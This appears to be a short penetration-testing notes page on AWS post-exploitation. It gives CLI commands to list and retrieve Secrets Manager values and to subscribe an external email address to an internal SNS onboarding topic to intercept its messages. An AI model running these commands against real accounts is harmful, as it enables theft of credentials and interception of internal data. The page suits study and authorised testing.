Skip to content

Secrets & Notification Services



Enumerate and exploit Secrets Manager, SNS topics, or other services that may leak sensitive data.

Secrets Manager Enumeration & Exfiltration


List All Secrets (if permitted)

aws secretsmanager list-secrets --region us-east-1
Retrieve Secret Values
aws secretsmanager get-secret-value \
  --secret-id <SecretName> \
  --region us-east-1

note

If a role or user attached to the instance (via IMDS) has secretsmanager:GetSecretValue, you can retrieve high-value secrets (API keys, database credentials, etc.).

Simple Notification Service (SNS) Enumeration


Identify Topic ARNs If you’ve discovered an SNS topic ARN (e.g., via Secrets Manager or CloudFormation), subscribe to it to intercept messages (which sometimes contain provisioning or β€œonboarding” notifications).

aws sns list-topics --region us-east-1
Subscribe to a topic
aws sns subscribe \
  --topic-arn arn:aws:sns:us-east-1:<ACCOUNT_ID>:Onboarding_New_Internal_Dev_Msg_01 \
  --protocol email \
  --notification-endpoint [email protected] \
  --region us-east-1